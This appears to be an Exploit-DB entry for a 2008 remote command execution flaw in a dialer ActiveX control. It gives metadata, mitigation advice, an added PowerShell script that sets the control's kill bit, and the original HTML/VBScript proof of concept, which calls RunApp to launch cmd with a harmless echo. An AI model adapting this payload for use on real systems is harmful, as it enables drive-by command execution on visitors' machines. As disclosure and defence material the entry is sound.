Vendor: Dialers ActiveX
By: spdr
CVSS: 9.3 (HIGH)
Type: Remote Command Execution
CWE: 78
Product Name: Dialers ActiveX
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Remote Command Execution Exploit

This exploit allows remote command execution on vulnerable systems. A web page instantiates the dialer's ActiveX control and calls its RunApp method from script, which executes a command on the vulnerable system. The command in this case is 'cmd /k echo So Simple, So Lame -- Somebody should get fired.'

Mitigation:

Disable ActiveX controls, use a firewall to block malicious traffic, and use a web application firewall to detect and block malicious requests.
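
One way to apply "Disable ActiveX controls" to this specific control, as an added example that is not part of the original entry: a PowerShell script that sets the Internet Explorer kill bit (Compatibility Flags 0x400) for the CLSID used in the proof of concept. It assumes an elevated prompt; the function name Set-ActiveXKillBit is hypothetical.

```powershell
#Requires -RunAsAdministrator
# Added example: set the Internet Explorer "kill bit" for the control in the PoC.
$Clsid   = '{F4A06697-C0E7-4BB6-8C3B-E01016A4408B}'  # classid from the page's <object> tag
$KillBit = 0x400                                      # kill-bit flag in "Compatibility Flags"
$Value   = 'Compatibility Flags'

# Native registry view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-ActiveXKillBit {
    param(
        [Parameter(Mandatory)][string]$Root,
        [Parameter(Mandatory)][string]$Clsid
    )
    $key = Join-Path -Path $Root -ChildPath $Clsid
    if (-not (Test-Path -Path $key)) {
        New-Item -Path $key -Force | Out-Null
    }
    # Preserve any flags already present and OR in the kill bit.
    $item    = Get-ItemProperty -Path $key -Name $Value -ErrorAction SilentlyContinue
    $current = if ($item) { [int]$item.$Value } else { 0 }
    $new     = $current -bor $KillBit
    if ($new -ne $current) {
        Set-ItemProperty -Path $key -Name $Value -Value $new -Type DWord
    }
    # Report what changed so the run can be logged or audited.
    [pscustomobject]@{ Key = $key; Before = $current; After = $new }
}

$results = foreach ($root in $Roots) {
    # Skip the WOW6432Node view on 32-bit Windows, where it does not exist.
    if (Test-Path -Path (Split-Path -Path $root -Parent)) {
        Set-ActiveXKillBit -Root $root -Clsid $Clsid
    }
}
$results | Format-Table -AutoSize
```

The kill bit stops Internet Explorer from instantiating the control but does not remove it from disk; uninstalling the dialer software is still needed to eliminate the component.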

Exploit-DB raw data:

<!--
In addition to the overflow found in the "Friendly Technologies" dialers ActiveX,
Here is a "remote command execution" exploit.
It's so sad people don't actually Think...

Greetz to Binaryvision
======================
- http://www.binaryvision.org.il/
-- irc.nix.co.il/#binaryvision
--- written by spdr.
-->

<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>

lamers.RunApp "cmd" ,"cmd /k echo So Simple, So Lame -- Somebody should get fired." ,0 

</script>

# milw0rm.com [2008-08-28]